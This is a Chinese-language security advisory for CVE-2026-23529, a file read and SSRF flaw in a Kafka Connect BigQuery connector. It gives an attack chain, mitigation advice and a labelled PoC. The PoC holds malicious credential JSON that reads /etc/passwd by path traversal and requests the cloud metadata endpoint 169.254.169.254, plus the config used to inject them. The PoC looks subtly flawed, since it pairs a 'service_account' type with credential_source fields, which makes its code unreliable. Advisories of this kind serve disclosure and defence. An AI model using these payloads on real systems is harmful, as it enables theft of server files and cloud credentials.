CVE-2026-23529 Kafka Connect BigQuery Connector 任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2026-23529

漏洞类型

任意文件读取/SSRF

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kafka Connect BigQuery Connector (Aiven-Open/bigquery-connector-for-apache-kafka)

漏洞概述

Kafka Connect BigQuery Connector是Apache Kafka到Google BigQuery的sink连接器实现。该连接器在2.11.0之前的版本中存在严重的安全漏洞，允许未经授权的任意文件读取和服务器端请求伪造(SSRF)攻击。攻击者可以通过在Google Cloud凭证配置中注入恶意的credential_source.file路径或credential_source.url端点，利用Google认证库的默认行为读取服务器上的敏感文件或向外部服务端点发起请求。此漏洞无需高权限即可利用，CVSS评分7.7，属于高危漏洞。由于Kafka Connect常用于企业数据管道中，可能导致敏感业务数据、密钥凭证等机密信息泄露。

技术细节

漏洞根因在于Aiven的Google BigQuery Kafka Connect Sink连接器在处理凭证配置时缺乏输入验证。具体来说：1) 连接器允许用户在配置中提供Google Cloud凭证JSON文件；2) Google认证库会处理这些凭证并支持credential_source.file和credential_source.url两种配置方式；3) 连接器未对这些外部来源的凭证配置进行安全验证，直接传递给认证库。攻击者可以通过构造恶意的credential_source.file路径(如../../../../etc/passwd)读取服务器任意文件，或通过credential_source.url指向恶意端点发起SSRF攻击探测内网服务。该漏洞影响所有使用受影响版本连接器且允许用户控制凭证配置的场景。修复版本为2.11.0。

攻击链分析

STEP 1

1

攻击者获取Kafka Connect BigQuery连接器配置权限

STEP 2

2

构造包含恶意credential_source.file路径或credential_source.url的凭证JSON文件

STEP 3

3

通过连接器配置接口将恶意凭证文件路径或内容注入到连接器配置中

STEP 4

4

连接器启动时，Google认证库处理凭证配置，触发文件读取或SSRF请求

STEP 5

5

攻击者获取服务器敏感文件内容(如/etc/passwd、SSH密钥等)或探测内网服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-23529 PoC - Malicious BigQuery Credential Configuration # This PoC demonstrates arbitrary file read via credential_source.file malicious_credential = { "type": "service_account", "project_id": "attacker-controlled-project", "private_key_id": "1234567890", "private_key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQ...\n-----END RSA PRIVATE KEY-----\n", "client_email": "[email protected]", "client_id": "123456789", "auth_uri": "https://accounts.google.com/o/oauth2/auth", "token_uri": "https://oauth2.googleapis.com/token", "credential_source": { # Arbitrary file read via file path traversal "file": "../../../../etc/passwd" } } # SSRF PoC via credential_source.url malicious_credential_ssrf = { "type": "service_account", "project_id": "attacker-controlled-project", "private_key_id": "1234567890", "private_key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQ...\n-----END RSA PRIVATE KEY-----\n", "client_email": "[email protected]", "client_id": "123456789", "auth_uri": "https://accounts.google.com/o/oauth2/auth", "token_uri": "https://oauth2.googleapis.com/token", "credential_source": { # SSRF attack via URL pointing to internal service "url": "http://169.254.169.254/latest/meta-data/" } } # Exploitation: Inject via Kafka Connect connector configuration # POST /connectors endpoint with malicious config connector_config = { "name": "bigquery-sink", "config": { "connector.class": "com.wepay.kafka.connect.bigquery.BigQuerySinkConnector", "gcp.bigquery.credentials.file": "/tmp/malicious_credential.json", # Path to malicious file "gcp.bigquery.project": "victim-project" } }

影响范围

bigquery-connector-for-apache-kafka < 2.11.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下缓解措施：1) 限制Kafka Connect配置权限，仅允许受信任的管理员配置连接器；2) 对用户提供的凭证JSON文件进行严格的内容校验，拒绝包含credential_source字段的配置；3) 使用网络隔离和防火墙规则限制连接器服务器的网络访问；4) 监控凭证配置变更和异常的文件访问/网络请求行为。